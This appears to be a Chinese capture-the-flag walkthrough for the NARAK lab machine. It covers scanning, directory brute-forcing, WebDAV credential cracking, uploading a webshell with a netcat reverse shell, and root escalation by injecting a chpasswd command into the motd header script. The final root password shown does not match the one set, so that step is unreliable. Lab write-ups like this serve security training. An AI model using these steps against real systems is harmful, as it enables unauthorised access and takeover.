narak 靶机实验实战演练
靶机:NARAK
kali : 192.168.71.128
靶机 :192.168.71.129
渗透流程:
- 探测靶机ip地址
命令:fping -aqg 192.168.71.0/24
2. nmap进行靶机端口服务扫描
命令:nmap -sC -sV 192.168.71.129 -n -vv -min-rate=2000
3.进行web页面登录
通过查看网页源码,可见没有什么可以利用的
目录扫描
使用kali中的dirb工具进行目录扫描:
命令: dirb http://192.168.71.129
通过扫描后,查看发现了有一个webdav目录。
192.168.71.129/webdav
然后去访问这个目录试试,发现需要用户名密码登录。
这时,我们使用kali 下的cewl 字典生成工具 爬取该页面存在的密码,生成一个password.txt 文件。
命令:cewl 192.168.71.129 -w password.txt
密码本爆破
账号: yamdoot
密码: Swarg
上传webshell.php
命令:put webshell.php
上传成功之后,需要访问192.168.71.129建立反向连接,访问网站之前开启监听,监听命方法如下:nc -lvvp 4444
重新去访问:192.168.71.129/webdav ,点击刚刚上传的 webshell.php
看到如下情况说明成功回弹webshell
通过python进行交互:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
注:这里的引号都是需要英文状态下输入
可以看到home下有三个用户:inferno 、narak、yamdoot
发现了/mnt 目录下 的 hell.sh 文件
通过 登录 BF 在线解码
网址:https://www.splitbrain.org/services/ook
通过点击 Brainfuck to Text 进行解码得到 chitragupt
依次使用home家目录下的用户名,以及BF解码后的密码进行提权;
用户名:inferno
密码为:chitragupt
当尝试到切换到 用户名为 inferno 进行su 提权 时可以成功登录
ls 发现user.txt文件
cat查看txt文件,得到Flag;
5. 提权:
修改00-header
echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header
退出重新登录,su root刚刚更改的密码:
su - root
password:justice
narak 靶机实验实战演练相关推荐
- Thoth-Tech靶机实验实战演练
一.明确目标 # UBUNTU 靶机获取不到ip的小技巧: nano /etc/netplan/00-installer-config.yaml 配置文件目录下 使用 Nano 更改网络配置 改成e ...
- Gaara靶机实验实战演练
一.确定目标 实验环境 VMware Workstation Xshell 靶机ip : 192.168.119.147 Kali ip : 192.168.119.129 二.信息搜集 Nm ...
- recon靶机实验实战演练
一.明确目标 靶机ip 192.168.119.150 Kali ip 192.168.119.129 二.信息搜集 Nmap 搜集端口信息 访问80端口 使用direarch搜集目录信息 常见状态码 ...
- lampiao靶机实验实战演练
一.明确目标 探测主机存活情况 靶机 ip : 192.168.119.155 Kali ip :192.168.119.129 二.信息搜集 Nmap 进行常规端口开放扫描 开放了22 ssh 8 ...
- m87靶机实验实战演练
一.明确目标 Kali: ip 192.168.119.129 靶机:ip 192.168.119.146 二.信息搜集 端口扫描:nmap 192.168.119.146 开放了22.80.9090 ...
- 渗透测试实例,xampp靶机实验
实验名称:渗透测试实例,xampp靶机实验 实验目的:对xampp靶机进行渗透测试 实验环境:Kali虚拟机一台4G xampp靶机一台 IP:192.168.22.128 实验步骤: 一.对靶机进行 ...
- 搭建kali和win xp靶机实验环境
1.下载并安装VMware workstation 16.自行百度密钥. 2.安装kali linux系统,桥接模式,设置IP地址. 从kali官网下载(https://www.kali.org/ge ...
- 从外网Thinkphp3日志泄露到杀入内网域控 - 红队攻击之域内靶机渗透实战演练
1.简要描述 这个工具写完有一段时间了,看网上目前还没有一个thinkphp的漏洞集成检测工具,所以打算开源出来. 2.代码结构 插件化思想,所有的检测插件都plugins目录里,TPscan.py主 ...
- 从入门到入土:Nessus出击:使用nessus扫描某台靶机
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...
最新文章
- 清华大学:2021元宇宙研究报告!
- 火遍AI圈的万字长文,Lecun却说“标题太好笑,作者发推宣战:欢迎来辩!
- Raw264.7培养经验分享
- 解决:EXCEL复制粘贴,精度丢失
- Eclipse使用SVN
- 考研计算机专业课统考吗,09考研计算机专业课统考增至4部分内容
- mybatis typehandler
- python文件按行读取变为嵌套列表_迭代两个嵌套的2D列表,其中list2具有list1的行号...
- iPhone6s用户感动!升级ios13还能再战两年
- JadClipse反编译工具在MyEclipse中的安装(先看Eclipse的配置方式)
- 如何化身BAT面试收割机?都是精髓!
- bool类型头文件_C++ Primer Chapter2 变量和基本类型
- 一系列JavaScript的基础工具
- 【Matlab数学建模】层次分析法
- JAVA调用 TSC 打印机 打印中文问题/JNA中文乱码
- 微信联系人一键导出的方法在这里
- setup factory 会话变量
- MSF利用pcshare控住目标主机
- 降低技术应用门槛,易现推动“AR+”迈上新台阶
- 3D打印无人机等无人设备6——谈一谈从设计到实践的分分合合,模型如何合并与拆分?
热门文章
- 数字调制解调—2ASK
- 怎么编辑PDF文件?分享三种好用的编辑方法
- 新闻推荐--从DKN出发
- 复制文本到word中时产生底色的去除方法
- Linux学习之错误与解决记录(持续更新)
- websocket访问ServletAPI
- 2022年自考专业考试(英语)英语翻译练习题
- pkpm板按弹性计算还是塑性_请教:筏板是按弹性算法?还是塑性算法?那个好些?...
- python提取微信聊天语音_利用Python进行微信,QQ的语音识别!内部技术的延伸版!...
- Ardunio开发实例-MAX30102脉搏血氧饱和度和心率监测传感器